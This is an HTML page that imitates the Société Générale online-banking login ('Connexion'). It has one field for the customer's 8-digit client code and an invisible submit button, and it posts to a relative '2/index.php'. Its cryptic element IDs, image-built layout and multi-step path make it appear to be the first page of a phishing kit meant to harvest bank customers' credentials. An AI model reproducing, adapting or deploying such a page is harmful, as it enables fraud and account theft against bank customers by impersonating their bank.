<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<title>Société Générale | Connexion</title>
		<link href="styles.css" rel="stylesheet" type="text/css">
	</head>
	<body>
		<div id="background"><form method="post" action="2/index.php">
			<div id="Calque0"><img src="images/Calque0.png"></div>
			<div id="rimk"><input id="ramo" name="ramid" type="text" placeholder="Saisissez votre code client"  autocapitalize="off" autocorrect="off" pattern="[0-9]*" aria-label="Code client" placeholder=" " autocomplete="off" maxlength="8" required=""></div>
			<input type="submit" id="zviva" name="" value="" style="position:absolute;left:299px;top:325px;width:231px;height:47px;z-index:5;">
		</div>
 </body>
 </html>